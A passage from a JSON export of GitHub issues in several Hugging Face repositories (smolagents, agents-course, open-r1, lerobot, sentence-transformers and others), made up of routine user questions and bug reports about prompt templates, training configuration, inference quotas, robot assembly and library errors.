    "body": "I'm trying to configure custom template variables in my system prompt.\n\n**Current Implementation:**\n\n1. I have a system prompt template with custom variables:\n```python\nCUSTOM_CODE_SYSTEM_PROMPT = \"\"\"You are {{ bot_name }}, a customer support assistant...\n{{ formatting_guidelines }}\n```\n\n2. Agent creation and configuration:\n```python\nfrom smolagents import CodeAgent, LiteLLMModel\n\ndef get_agent(platform: str = \"whatsapp\", variables: dict = None):\n    manager_agent = CodeAgent(\n        tools=[ClinicKnowledgeTool()],\n        model=model,\n        max_steps=3,\n    )\n    return manager_agent\n```\n\n3. Calling the agent:\n```python\nagent = get_agent(\n    platform=platform,\n    variables={\n        \"conversation_history\": conversation_history,\n        \"formatting_guidelines \": \"test\",\n    },\n)\n\nagent.prompt_templates[\"system_prompt\"] = CUSTOM_CODE_SYSTEM_PROMPT\n```\n\n**Questions:**\n1. What's the correct way to populate template variables like `{{ bot_name }}` and `{{ formatting_guidelines }}` in the system prompt?\n2. How do I handle dynamic variables like `conversation_history` that change with each request?\n\n**Environment:**\n- smolagents v1.10.0 \n- Python 3.10+\n- FastAPI integration",
    "url": "https://github.com/huggingface/smolagents/issues/902",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-06T20:45:51Z",
    "updated_at": "2025-03-07T08:54:22Z",
    "user": "Luisotee"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 295,
    "title": "[QUESTION] Ambiguity what chat templates are.",
    "body": "Issue:\n\nWhere \u27a1  https://huggingface.co/learn/agents-course/unit1/messages-and-special-tokens\n\n> This is where chat templates come in. They act as the bridge between conversational messages (user and assistant turns) and the specific formatting requirements of your chosen LLM. In other words, chat templates structure the communication between the user and the agent, ensuring that every model\u2014despite its unique special tokens\u2014receives the correctly formatted prompt.\n\nIn my opinion, the first sentence about chat templates is correct. The second part seems wrong.\n\nIt says  `...chat templates structure the communication between the user and the agent...`. \n\nCorrect Sentence:\n\n`...chat templates structure the communication between the agents and the language model or LLM...`. \n\nReason:\n\nThe Chat templates are implemented inside the agents with respective `chat.completion` method to send the user's request, through agents, to the LLMs. \n\nThe user just types into the chatbox as similar to how we type messages. The text-flow is as below in it's simplest form is as below:\nUser's message >> Chat Templates wraps the message as per LLM's specs >> send to LLMs through agents.\n\nSo the `the user and the agent` part doesn't seem very right to me. I did give my best alternative, I could thought of. I okay with anything else you come up with.",
    "url": "https://github.com/huggingface/agents-course/issues/295",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-06T17:12:41Z",
    "updated_at": "2025-03-06T17:12:41Z",
    "user": "MekongDelta-mind"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 483,
    "title": "How to calculate total optimization steps",
    "body": "I ran it on 8 GPUs and set num_generations to 8, num_processes=7\uff0c Why Total optimization steps=196, isn't it Num examples/Total train batch size? It seems that multiplying by num_generations yields 196. Why do we need to multiply by num_generations\uff1f\n[INFO|trainer.py:2405] 2025-03-06 12:04:09,913 >> ***** Running training *****\n[INFO|trainer.py:2406] 2025-03-06 12:04:09,913 >>   Num examples = 5,498\n[INFO|trainer.py:2407] 2025-03-06 12:04:09,914 >>   Num Epochs = 1\n[INFO|trainer.py:2408] 2025-03-06 12:04:09,914 >>   Instantaneous batch size per device = 8\n[INFO|trainer.py:2411] 2025-03-06 12:04:09,914 >>   Total train batch size (w. parallel, distributed & accumulation) = 224\n[INFO|trainer.py:2412] 2025-03-06 12:04:09,914 >>   Gradient Accumulation steps = 4\n[INFO|trainer.py:2413] 2025-03-06 12:04:09,914 >>   Total optimization steps = 196\n[INFO|trainer.py:2414] 2025-03-06 12:04:09,915 >>   Number of trainable parameters = 7,615,616,512",
    "url": "https://github.com/huggingface/open-r1/issues/483",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-06T09:47:19Z",
    "updated_at": "2025-03-13T08:45:23Z",
    "user": "HelloWorld506"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1221,
    "title": "How to use Xenova/deplot using the transformers.js library.",
    "body": "### Question\n\nCurrently I'm doing:\n\n```\n      this.pipeline = await pipeline(\"image-text-to-text\", \"Xenova/deplot\", {\n        progress_callback: (progress) => {\n          this.updateProgress({ \n            status: `Loading model: ${progress.status}`, \n            progress: 0.1 + (progress.progress * 0.9) \n          });\n        },\n        device: \"cpu\",\n        dtype: dtype,\n      });\n```\n\nI get the following error:\n\n```\nError: Unsupported pipeline: image-text-to-text. Must be one of [text-classification,token-classification,question-answering,fill-mask,summarization,translation,text2text-generation,text-generation,zero-shot-classification,audio-classification,zero-shot-audio-classification,automatic-speech-recognition,text-to-audio,image-to-text,image-classification,image-segmentation,zero-shot-image-classification,object-detection,zero-shot-object-detection,document-question-answering,image-to-image,depth-estimation,feature-extraction,image-feature-extraction]\n```",
    "url": "https://github.com/huggingface/transformers.js/issues/1221",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-06T07:56:07Z",
    "updated_at": "2025-03-06T11:36:19Z",
    "user": "aadya940"
  },
  {
    "repo": "huggingface/peft",
    "number": 2410,
    "title": "running forward loop using get_peft_model disables requires_grad on output",
    "body": "Hi, \nI would like to report a recent issue I have been facing, but I am not sure if it is a bug or I am doing something wrong in the process. The steps to re-create the steps are easy. The issue happens when I try to convert **Qwen2-VL-2B-Instruct** model into a PEFT model using `get_peft_model` method. Simply load the model using the sample code in https://huggingface.co/Qwen/Qwen2-VL-2B-Instruct and try to convert it to a PEFT model using a typical **8bit** LoraConfig with just sample `target_modules=[\"q_proj\", \"v_proj\"]`. Then simply run a forward call to the model using a dummy input, such as `input_ids = torch.zeros((4, 1247)).to(device)`. When I inspect the `requires_grad` of `logits` attribute of the output, it is False. Meaning that I cannot run backward based on that output. This issue has been puzzling me for a while. I would appreciate if you can help me with a solution or advice how to address it properly. \n",
    "url": "https://github.com/huggingface/peft/issues/2410",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-06T05:12:42Z",
    "updated_at": "2025-04-13T15:03:40Z",
    "comments": 4,
    "user": "Hamidreza3252"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 826,
    "title": "Should the pi0 pytorch model on Huggingface load model.safetensors or the other three satetensors?",
    "body": "https://huggingface.co/lerobot/pi0/tree/main\n\nWhat is the difference between `model.safetensors` and the other three satetensors (`model-00001-of-0000*.safetensors`)? The pi0 model `from_pretrained()` method will load `model.safetensor`s by default instead of `model-00001-of-0000*.safetensors`.\n\n",
    "url": "https://github.com/huggingface/lerobot/issues/826",
    "state": "closed",
    "labels": [
      "question",
      "stale"
    ],
    "created_at": "2025-03-06T03:12:05Z",
    "updated_at": "2025-10-08T08:42:49Z",
    "user": "chopinxxxx"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 290,
    "title": "[QUESTION] First Agent code does not produce any output",
    "body": "I cloned and tried running the first agent app.py. I wanted to try the image generation tool. the application built and ran but when I tried typing something in the chat such as \"generate an image of a cat\", there is no response from the bot. it stays blank\n",
    "url": "https://github.com/huggingface/agents-course/issues/290",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-05T23:49:06Z",
    "updated_at": "2025-03-18T14:45:44Z",
    "user": "Sabk0926"
  },
  {
    "repo": "huggingface/accelerate",
    "number": 3421,
    "title": "How to sync distribute model paramaters when training with continual learning fashion?",
    "body": "When performing distributed continual learning tasks, it is common to expand model parameters as tasks increase. For example, I have defined an `expand_classifier()`  method with random initialization to increase the parameters of the classifier. \n\nHow can I ensure that the newly added parameters are initialized the same on each GPU model?\n\nIf i do\n```\nif self.accelerator.is_main_process:\n    self.model.module.prompt.expand_classifier()\n\n```\nHow can i sync classifier across all distributed model?",
    "url": "https://github.com/huggingface/accelerate/issues/3421",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-05T13:44:15Z",
    "updated_at": "2025-04-13T15:06:22Z",
    "user": "Iranb"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 817,
    "title": "SO 100 Arm assembly instruction inconsistency",
    "body": "Step 22 of the assembly guide shows a picture of wrist that is flipped comparing to the drawing and front page photo. Are both right? If not, which one is correct?\n\n[Latest instruction](https://github.com/huggingface/lerobot/blob/main/examples/10_use_so100.md#wrist-assembly):\n\"Image\"\n\n[Assembly video](https://github.com/huggingface/lerobot/blob/main/examples/10_use_so100.md#additional-guidance):\n\"Image\"\n\n[Project home page](https://github.com/huggingface/lerobot/tree/main?tab=readme-ov-file#------------build-your-own-so-100-robot):\n![Image](https://github.com/user-attachments/assets/f23cf441-93f9-4bd5-aeba-45d2d81aa80d)",
    "url": "https://github.com/huggingface/lerobot/issues/817",
    "state": "closed",
    "labels": [
      "question",
      "robots",
      "stale"
    ],
    "created_at": "2025-03-05T05:23:57Z",
    "updated_at": "2025-11-30T02:37:07Z",
    "user": "liuhuanjim013"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 472,
    "title": "how to set  the max_model_length, max_new_tokens and generation_size when evaluate ?",
    "body": "Suppose the max_position_embedding of my model is 4096, how to set max_model_length, max_new_tokens and generation_size  to. get the correct evaluate result?  For example , set max_model_length=4096, max_new_tokens=1000, generation_size=1000?",
    "url": "https://github.com/huggingface/open-r1/issues/472",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-05T04:01:48Z",
    "updated_at": "2025-03-12T03:41:42Z",
    "user": "ItGirls"
  },
  {
    "repo": "huggingface/transformers",
    "number": 36546,
    "title": "how to use transformers with musicgen with float16",
    "body": "```\nimport transformers, torch, builtins, numpy\n\nprocessor = transformers.AutoProcessor.from_pretrained(' facebook/musicgen-stereo-melody-large', torch_dtype=torch.float16)\nmodel = transformers.MusicgenMelodyForConditionalGeneration.from_pretrained('facebook/musicgen-stereo-melody-large ,torch_dtype=torch.float16).to('cuda')\n\nresult = []\nfor _ in builtins.range(2):\n    inputs = processor(audio=result[-1] if result else None, sampling_rate=model.config.audio_encoder.sampling_rate, text='A grand and majestic symphony with soaring strings, powerful brass, and dynamic orchestration. Inspired by Beethoven and Tchaikovsky, featuring dramatic crescendos, delicate woodwind passages, and a triumphant finale. The mood is epic, emotional, and timeless', padding=True, return_tensors='pt').to('cuda')\n    audio_values = model.generate(**inputs, max_new_tokens=1000)\n    result += audio_values[0, 0].cpu().numpy(),\n\nfrom IPython.display import Audio\nAudio(numpy.concatenate(result), rate=model.config.audio_encoder.sampling_rate)\n```\ni alwayse get\n```\n in ()\n      7 for _ in builtins.range(2):\n      8     inputs = processor(audio=torch.from_numpy(result[-1]).to(dtype=torch.float32) if result else None, sampling_rate=model.config.audio_encoder.sampling_rate, text='A grand and majestic symphony with soaring strings, powerful brass, and dynamic orchestration. Inspired by Beethoven and Tchaikovsky, featuring dramatic crescendos, delicate woodwind passages, and a triumphant finale. The mood is epic, emotional, and timeless', padding=True, return_tensors='pt').to('cuda')\n----> 9     audio_values = model.generate(**inputs, max_new_tokens=1000)\n     10     result += audio_values[0, 0].cpu().numpy(),\n     11 \n\n5 frames\n/usr/local/lib/python3.11/dist-packages/torch/nn/modules/linear.py in forward(self, input)\n    123 \n    124     def forward(self, input: Tensor) -> Tensor:\n--> 125         return F.linear(input, self.weight, self.bias)\n    126 \n    127     def extra_repr(self) -> str:\n\nRuntimeError: mat1 and mat2 must have the same dtype, but got Float and Half\n```\n",
    "url": "https://github.com/huggingface/transformers/issues/36546",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-05T00:40:24Z",
    "updated_at": "2025-03-06T09:49:18Z",
    "user": "ghost"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 813,
    "title": "State Collection Timing Issue in Manipulator Teleoperation: Post-action vs Pre-action States",
    "body": "**Description:**\nI've noticed in lerobot/lerobot/common/robot_devices/robots/manipulator.py that during teleoperation, the state being collected is the state after action execution. Is this intended behavior?\nIn my understanding, model inference should use the state before action execution, not after. This could potentially impact learning and inference accuracy, as the model would be using post-action states to predict actions rather than pre-action states.\n\n![Image](https://github.com/user-attachments/assets/89a88379-9369-4eda-8885-8a250ca950dc)\n\n![Image](https://github.com/user-attachments/assets/1ad0705a-e225-4858-94d0-1b774bb4a974)\n",
    "url": "https://github.com/huggingface/lerobot/issues/813",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-03-04T14:19:52Z",
    "updated_at": "2025-10-07T02:26:55Z",
    "user": "www-Ye"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 284,
    "title": "[QUESTION] Clarify Payment Required for completing Unit 2 notebooks",
    "body": "For the notebook for [components.ipynb]() I ran the `IngestionPipeline` function as follows:\n\n```py\nfrom llama_index.embeddings.huggingface_api import HuggingFaceInferenceAPIEmbedding\nfrom llama_index.core.node_parser import SentenceSplitter\nfrom llama_index.core.ingestion import IngestionPipeline\n\n# create the pipeline with transformations\npipeline = IngestionPipeline(\n    transformations=[\n        SentenceSplitter(),\n        HuggingFaceInferenceAPIEmbedding(model_name=\"BAAI/bge-small-en-v1.5\"),\n    ]\n)\n\n# run the pipeline sync or async\nnodes = await pipeline.arun(documents=documents[:10])\nnodes\n```\n\nI got the following outcome and looks like this .ipynb can't be executed without a payment route:\n\n```python\n---------------------------------------------------------------------------\n\nClientResponseError                       Traceback (most recent call last)\n\n[](https://localhost:8080/#) in ()\n     12 \n     13 # run the pipeline sync or async\n---> 14 nodes = await pipeline.arun(documents=documents[:10])\n     15 nodes\n\n12 frames\n\n[/usr/local/lib/python3.11/dist-packages/aiohttp/client_reqrep.py](https://localhost:8080/#) in raise_for_status(self)\n   1159                 self.release()\n   1160 \n-> 1161             raise ClientResponseError(\n   1162                 self.request_info,\n   1163                 self.history,\n\nClientResponseError: 402, message='Payment Required', url='https://api-inference.huggingface.co/pipeline/feature-extraction/BAAI/bge-small-en-v1.5'\n```\n\nis there any free and open alternatives?\n",
    "url": "https://github.com/huggingface/agents-course/issues/284",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-04T14:16:01Z",
    "updated_at": "2025-03-06T16:08:39Z",
    "user": "carlosug"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 281,
    "title": "[any free and unpaid alternative for Inference Providers?]",
    "body": "while executing the [notebook](https://colab.research.google.com/github/huggingface/agents-course/blob/main/notebooks/unit2/smolagents/multiagent_notebook.ipynb) on **unit2. multi agent systems**, i got the following client error for [Inference Providers](https://huggingface.co/blog/inference-providers):\n\n```python\n\n> result = agent.run(task)\n\nHTTPError: 402 Client Error: Payment Required for url: https://huggingface.co/api/inference-proxy/together/v1/chat/completions\n\n\nThe above exception was the direct cause of the following exception:\n\nHfHubHTTPError                            Traceback (most recent call last)\n\n[/usr/local/lib/python3.11/dist-packages/huggingface_hub/utils/_http.py](https://localhost:8080/#) in hf_raise_for_status(response, endpoint_name)\n    475         # Convert `HTTPError` into a `HfHubHTTPError` to display request information\n    476         # as well (request id and/or server error message)\n--> 477         raise _format(HfHubHTTPError, str(e), response) from e\n    478 \n    479 \n\nHfHubHTTPError: 402 Client Error: Payment Required for url: https://huggingface.co/api/inference-proxy/together/v1/chat/completions (Request ID: Root=1-67c6f46c-005ae18a6bffc88c0d7a6668;04e6891c-45f6-4358-81fc-b5b794f25ddd)\n\nYou have exceeded your monthly included credits for Inference Providers. Subscribe to PRO to get 20x more monthly allowance.\n```\n\nany free and unpaid alternative for Inference Providers?",
    "url": "https://github.com/huggingface/agents-course/issues/281",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-04T12:51:26Z",
    "updated_at": "2025-03-31T07:23:49Z",
    "user": "carlosug"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 808,
    "title": "How to acquire the End-Effector\uff08eef\uff09 pose?",
    "body": "Hi, thanks for your great job!\n\n    How can we acquire the eef pose and control the eef pose instead of only the joints states?\n\nThanks for your attention and hope for your kind response!",
    "url": "https://github.com/huggingface/lerobot/issues/808",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "robots",
      "stale"
    ],
    "created_at": "2025-03-04T09:30:35Z",
    "updated_at": "2025-10-16T02:28:50Z",
    "user": "oym1994"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 806,
    "title": "How to control local robot with remote model?",
    "body": "I have achieved the inference process on my local computer. I want to know how to put the model on a remote server and control a robot on local.\n\nMy robot: Koch1.1",
    "url": "https://github.com/huggingface/lerobot/issues/806",
    "state": "closed",
    "labels": [
      "question",
      "stale"
    ],
    "created_at": "2025-03-04T09:09:12Z",
    "updated_at": "2025-10-16T02:28:51Z",
    "user": "neverspillover"
  },
  {
    "repo": "huggingface/optimum-intel",
    "number": 1186,
    "title": "How to initialize development env for this repo?",
    "body": "Hi! I would like to develop this repo, met some issues during env initialization. I ran `pip install -e .` to install current repo to local python env.\nHowever error came out when running 'pytest tests\\'\n`ImportError while importing test module '/home/shji/codes/optimum-intel/tests/ipex/test_modeling.py'.\nHint: make sure your test modules/packages have valid Python names.\nTraceback:\n../../miniforge3/envs/optimum-intel/lib/python3.11/importlib/__init__.py:126: in import_module\n    return _bootstrap._gcd_import(name[level:], package, level)\ntests/ipex/test_modeling.py:42: in \n    from optimum.intel import (\nE   ImportError: cannot import name 'IPEXModelForSeq2SeqLM' from 'optimum.intel' (/home/shji/codes/optimum-intel/optimum/intel/__init__.py`\n\nSeems like installation is wrong or something has been missed as local module cannot be found.\n\nCould you provide me some suggestions?  Any documentation for setting dev env would be better, thank you ",
    "url": "https://github.com/huggingface/optimum-intel/issues/1186",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-04T06:10:15Z",
    "updated_at": "2025-03-10T06:01:21Z",
    "user": "shjiyang-intel"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 457,
    "title": "How to run reject sampling",
    "body": "I ran generate_reaoning and got the cot data. How do I run reject sampling after that?",
    "url": "https://github.com/huggingface/open-r1/issues/457",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-03T03:56:32Z",
    "updated_at": "2025-03-03T03:56:32Z",
    "user": "JavaZeroo"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 797,
    "title": "use_delta_joint_actions_aloha",
    "body": "        if self.use_delta_joint_actions_aloha:\n            raise NotImplementedError(\n                \"`use_delta_joint_actions_aloha` is used by pi0 for aloha real models. It is not ported yet in LeRobot.\"\n            )\n\nwhen will you put implementation for it because it is very important\n",
    "url": "https://github.com/huggingface/lerobot/issues/797",
    "state": "closed",
    "labels": [
      "question",
      "policies"
    ],
    "created_at": "2025-03-02T18:14:13Z",
    "updated_at": "2025-04-03T16:39:39Z",
    "user": "AbdElrahmanMostafaRifaat1432"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 453,
    "title": "How to log the intermediate outputs results\uff1f",
    "body": "How to log the intermediate outputs results to track the 'aha moment'. How can I set this in config or modify the code?",
    "url": "https://github.com/huggingface/open-r1/issues/453",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-01T17:08:48Z",
    "updated_at": "2025-03-09T13:53:59Z",
    "user": "0205090923"
  },
  {
    "repo": "huggingface/Math-Verify",
    "number": 32,
    "title": "How to adjust the priority of '\\\\ln' and '*' when parsing latex?",
    "body": "When I try to parse a string: \"$$ \\\\dfrac{\\\\cos x}{2\\\\lnx * x^{\\\\ln x - 1}} $$\", the result is \"cos(x)/((2*log(x*x**(log(x, E) - 1), E)))\", rather than \"cos(x)/((2*x**(log(x, E) - 1)*log(x, E)))\". It seems that there is something wrong when dealing with the priority of '\\\\ln' and '*'. So I wonder how to adjust the priority to fix this error. Thank you!\n\nError case:\n\n![Image](https://github.com/user-attachments/assets/e6255a11-6365-4f9c-af2a-a2cd49092ea1)\n\nExpected (which changes the order of '\\\\ln'):\n\n![Image](https://github.com/user-attachments/assets/13459cf1-e245-420b-bff6-25d027bbce2f)",
    "url": "https://github.com/huggingface/Math-Verify/issues/32",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-01T09:22:31Z",
    "updated_at": "2025-07-01T20:17:49Z",
    "user": "yhhu99"
  },
  {
    "repo": "huggingface/smolagents",
    "number": 842,
    "title": "How to pass custom type variables to tools",
    "body": "\nI\u2019m working on a Telegram bot and using the `smolagents` library to create agents that handle reminders. The issue I\u2019m facing is related to passing the `context` object (which is specific to each message received by the bot) to a tool function (`add_reminder`). The `context` object is required to access the `job_queue` for scheduling reminders.\n\n### Problem:\nEven though I\u2019m passing the `context` variable through the `additional_args` argument in `agent.run`, the agent doesn\u2019t seem to pass this variable directly to the code interpreter. Instead, it redefines the variable as `None`, which causes the rest of the code to fail.\n\nHere\u2019s the relevant part of the code:\n\n```python\n@tool\ndef add_reminder(title: str,\n                    date_time: datetime.datetime,\n                    chat_id: str,\n                    context: Any,\n                    location: str = None,\n                    details: str = None) -> dict:\n    \n    '''\n    Add a reminder to the job queue.\n    \n    Args:\n    title: The title of the reminder  (str)\n    date_time: The time for the reminder\n    location: The location of the reminder if it is specified. If not then None (str)\n    details: The details of the reminder if it is specified. If not then None (str)\n    chat_id: pass the chat_id given to you\n    context: pass the context given to you\n    '''\n    \n    # try:\n    reminder = {}\n    reminder['Title'] = title\n    reminder['Time'] = date_time\n    reminder['Location'] = location\n    reminder['Details'] = details\n\n    # Convert the reminder time string to a localized datetime object\n    timer_date = date_time.replace(tzinfo=None)\n    timer_date = tz.localize(timer_date)\n    timer_date_string = timer_date.strftime(\"%H:%M %d/%m/%Y\")\n\n    timer_name = f\"{title} ({timer_date_string})\"\n    reminder['run'] = 'once'\n    reminder['text'] = reminder_to_text(reminder)\n\n    # Calculate the time remaining in seconds\n    now = datetime.datetime.now(tz)\n    seconds_until_due = (timer_date - now).total_seconds()\n\n    # Check if the time is in the past\n    if seconds_until_due <= 0:\n        return {'success': False, 'message': TXT_NOT_ABLE_TO_SCHEDULE_PAST}\n\n    reminder['type'] = 'parent'\n    \n    context.job_queue.run_once(\n        alarm,\n        when=timer_date,\n        chat_id=chat_id,\n        name=timer_name,\n        data=reminder,\n    )\n    \n    reminder['type'] = '-30'\n    context.job_queue.run_once(\n        alarm_minus_30,\n        when=timer_date - datetime.timedelta(minutes=30),\n        chat_id=chat_id,\n        name=timer_name,\n        data=reminder,\n    )\n        \n    return {'success': True, 'message': TXT_REMINDER_SCHEDULED, 'response_for_user': reminder['text']}\n\n\nasync def add_reminder_from_input(update, context):\n    # Add the reminder\n    input = update.message.text\n    chat_id = update.effective_chat.id\n    now = datetime.datetime.now(tz).strftime(\"%d/%m/%Y %H:%M\")\n    \n    logger.info(f'chat_id: {chat_id}, input: {input}')\n    \n\n    agent = CodeAgent(tools=[add_reminder],\n                     additional_authorized_imports=['datetime'],\n                     model=OpenAIServerModel(model_id='gpt-4o-mini', api_key = OPENAI_TOKEN),\n                     verbosity_level=3,\n                     max_steps = 2)\n                                               \n\n    answer = agent.run(TXT_MENU_AGENT_SYSTEM_PROMPT.format(input=input, now=now),\n                        additional_args={\"context\": context, \"chat_id\":chat_id})\n    \n    await send_message(update, context, text=answer)\n\n```\n\nWhen the agent runs, it generates code like this:\n\n```python\n \u2500 Executing parsed code: \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \n  from datetime import datetime, timedelta                                                                                                 \n                                                                                                                                           \n  # Set the reminder details                                                                                                               \n  title = \"Meeting with John\"                                                                                                      \n  date_time = datetime(2025, 3, 1, 9, 0)  # March 1, 2025, at 09:00                                                                        \n  chat_id = 6129357493                                                                                                                     \n  context = None  # This would typically be the provided context object                                                                    \n                                                                                                                                           \n  # Add the reminder                                                                                                                       \n  reminder_response = add_reminder(tit",
    "url": "https://github.com/huggingface/smolagents/issues/842",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-28T23:04:49Z",
    "updated_at": "2025-03-01T23:45:40Z",
    "user": "ebravofm"
  },
  {
    "repo": "huggingface/sentence-transformers",
    "number": 3254,
    "title": "How to train sentencetransformer with multiple negative\uff1f",
    "body": "I have a dataset like:  {'anchor':str,'postive':str,negative:list[str]}\nit seems invalid by example code \n\n```python\n    model = SentenceTransformer(model_path)\n\n    extend_position_embeddings(model._first_module().auto_model,max_length)\n\n    loss = CachedMultipleNegativesRankingLoss(model, mini_batch_size=16)\n\n\n    training_args = SentenceTransformerTrainingArguments(\n        output_dir=f\"./model_dir/{args.save_name}-{args.data_mode}\",\n        overwrite_output_dir=True,\n        logging_dir=\"./logs\",\n        logging_steps=1,\n        save_strategy='epoch',\n        save_total_limit=2,\n        # max_steps=900,\n        num_train_epochs=3,\n        warmup_ratio=0.05,\n        learning_rate=3e-5,\n        weight_decay=0.01,\n        gradient_accumulation_steps=16,\n        per_device_train_batch_size=4,\n        dataloader_num_workers=1,\n        batch_sampler=BatchSamplers.NO_DUPLICATES,\n        fp16=True,\n        lr_scheduler_type=\"cosine\",\n        remove_unused_columns=False,\n        # deepspeed='/mnt/dolphinfs/hdd_pool/docker/user/hadoop-aipnlp/INS/ruanjunhao04/ruanjunhao/chatrag-bench/train/ds3.json',\n        # gradient_checkpointing=True,\n    )\n\n\n\n    trainer = SentenceTransformerTrainer(\n        model=model,\n        args=training_args,\n        train_dataset=dataset,\n        loss=loss,\n    )\n    dataloader = trainer.get_train_dataloader()\n\n    for d in dataloader:\n        import pdb\n        pdb.set_trace()\n    trainer.train()\n\n\n\n```\n\n\n```bash\n\n  File \"/mnt/dolphinfs/hdd_pool/docker/user/hadoop-aipnlp/INS/ruanjunhao04/env/rjh/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 1191, in __init__\n    self._reset(loader, first_iter=True)\n  File \"/mnt/dolphinfs/hdd_pool/docker/user/hadoop-aipnlp/INS/ruanjunhao04/env/rjh/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 1228, in _reset\n    self._try_put_index()\n  File \"/mnt/dolphinfs/hdd_pool/docker/user/hadoop-aipnlp/INS/ruanjunhao04/env/rjh/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 1471, in _try_put_index\n    index = self._next_index()\n            ^^^^^^^^^^^^^^^^^^\n  File \"/mnt/dolphinfs/hdd_pool/docker/user/hadoop-aipnlp/INS/ruanjunhao04/env/rjh/lib/python3.12/site-packages/torch/utils/data/dataloader.py\", line 691, in _next_index\n    return next(self._sampler_iter)  # may raise StopIteration\n           ^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/mnt/dolphinfs/hdd_pool/docker/user/hadoop-aipnlp/INS/ruanjunhao04/env/rjh/lib/python3.12/site-packages/sentence_transformers/sampler.py\", line 193, in __iter__\n    value\nTypeError: unhashable type: 'list'\n```",
    "url": "https://github.com/huggingface/sentence-transformers/issues/3254",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-28T15:01:19Z",
    "updated_at": "2025-06-13T05:04:35Z",
    "user": "rangehow"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 789,
    "title": "how to run eval  with mujoco sim?",
    "body": "now ,run eval.py is only output in command line. how to run eval  with mujoco sim?",
    "url": "https://github.com/huggingface/lerobot/issues/789",
    "state": "closed",
    "labels": [
      "simulation",
      "stale"
    ],
    "created_at": "2025-02-28T10:42:46Z",
    "updated_at": "2025-10-08T11:57:42Z",
    "user": "mmlingyu"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 788,
    "title": "offline run convert_dataset_v1_to_v2.py",
    "body": "I need help!!!!!\nfor example\uff0cwhen i run convert_dataset_v1_to_v2.py, it prompts the following:\n\n![Image](https://github.com/user-attachments/assets/a4a87562-f0bd-444f-9e32-11cae281ae6f)\n\nand what is train.parquet?\n![Image](https://github.com/user-attachments/assets/8e24bb90-ef6c-4e55-9b1e-17acd7050312)\n\nhow to solve it?",
    "url": "https://github.com/huggingface/lerobot/issues/788",
    "state": "closed",
    "labels": [
      "bug",
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-02-28T06:41:43Z",
    "updated_at": "2025-10-09T21:54:09Z",
    "user": "ximiluuuu"
  },
  {
    "repo": "huggingface/sentence-transformers",
    "number": 3252,
    "title": "How to train sentence transformers with multi machines?",
    "body": "The [docs](https://sbert.net/docs/sentence_transformer/training/distributed.html) describes how to train sentence transformers with multi-GPUs.\n\nBut both my model and my data are huge, and training sentence transformers with 8 GPUs in one single machine is still very slow.\n\nDoes sentence transformers support training using mutiple machines, each with 8 GPUs. Do we have any examples?\n\nThank you very much.",
    "url": "https://github.com/huggingface/sentence-transformers/issues/3252",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-27T13:37:02Z",
    "updated_at": "2025-02-27T13:37:02Z",
    "user": "awmoe"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10917,
    "title": "Is lumina-2.0 script correct?",
    "body": "I wrote a script, based on the one provided [here](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_lumina2.py)\n\nit gets stuck on loss around 0.5, and i think it is a lot, isn't it?",
    "url": "https://github.com/huggingface/diffusers/issues/10917",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-27T11:17:00Z",
    "updated_at": "2025-02-28T15:46:43Z",
    "comments": 3,
    "user": "Riko0"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 444,
